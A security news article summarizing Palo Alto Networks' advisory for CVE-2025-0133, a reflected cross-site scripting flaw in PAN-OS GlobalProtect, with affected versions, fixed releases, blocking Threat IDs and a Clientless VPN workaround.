Palo Alto Networks has issued a security advisory for a reflected cross-site scripting (XSS) vulnerability, tracked as CVE-2025-0133, affecting its GlobalProtect gateway and portal components in PAN-OS software. The vulnerability allows attackers to craft phishing links that appear legitimate and can execute malicious JavaScript in the browser of authenticated users.
While the CVSS base score is 5.1 (Low) under default configurations, the risk increases to 6.9 (Medium) when Clientless VPN is enabled.
According to the advisory: “A reflected cross-site scripting (XSS) vulnerability in the GlobalProtect gateway and portal features of Palo Alto Networks PAN-OS software enables execution of malicious JavaScript in the context of an authenticated Captive Portal user’s browser when they click on a specially crafted link.”
This makes the flaw particularly concerning for phishing campaigns and credential theft scenarios, especially in environments using Clientless VPN functionality.
“The integrity impact of this vulnerability is limited to enabling an attacker to create phishing and credential-stealing links that appear to be hosted on the GlobalProtect portal,” the company added.
This vulnerability is specifically applicable to “PAN-OS firewall configurations with an enabled GlobalProtect gateway or portal“. The following PAN-OS versions are affected:
- Cloud NGFW: All versions
- PAN-OS 11.2: Versions prior to 11.2.7
- PAN-OS 11.1: Versions prior to 11.1.11
- PAN-OS 10.2: Versions prior to 10.2.17
- PAN-OS 10.1: All versions
It’s important to note that Prisma Access is unaffected.
As of now, “Palo Alto Networks is not aware of any malicious exploitation of this issue“. However, proof-of-concept exploit code is available for the vulnerability.
The solution is to upgrade to unaffected PAN-OS versions:
- PAN-OS 11.2: Upgrade to 11.2.7 or later (ETA June 2025)
- PAN-OS 11.1: Upgrade to 11.1.11 or later (ETA July 2025)
- PAN-OS 10.2: Upgrade to 10.2.17 or later (ETA August 2025)
- PAN-OS 10.1: Upgrade to 10.2.17 or later (ETA August 2025). Keep in mind that PAN-OS 10.1 is in Limited Support and reaches Software EOL in August 2025.
- For all other unsupported PAN-OS versions, upgrading to a supported fixed version is recommended.
For customers with a Threat Prevention subscription, a significant mitigation is available. “Threat ID 510003 and 510004 (introduced in Applications and Threats content version 8970)” can block attacks for this vulnerability. These Threat IDs are already “enabled on Prisma Access, which blocks the attack”.
Additionally, disabling Clientless VPN is a viable workaround to reduce the severity of this vulnerability. For comprehensive details, Palo Alto Networks advises reviewing the security advisory PAN-SA-2025-0005.
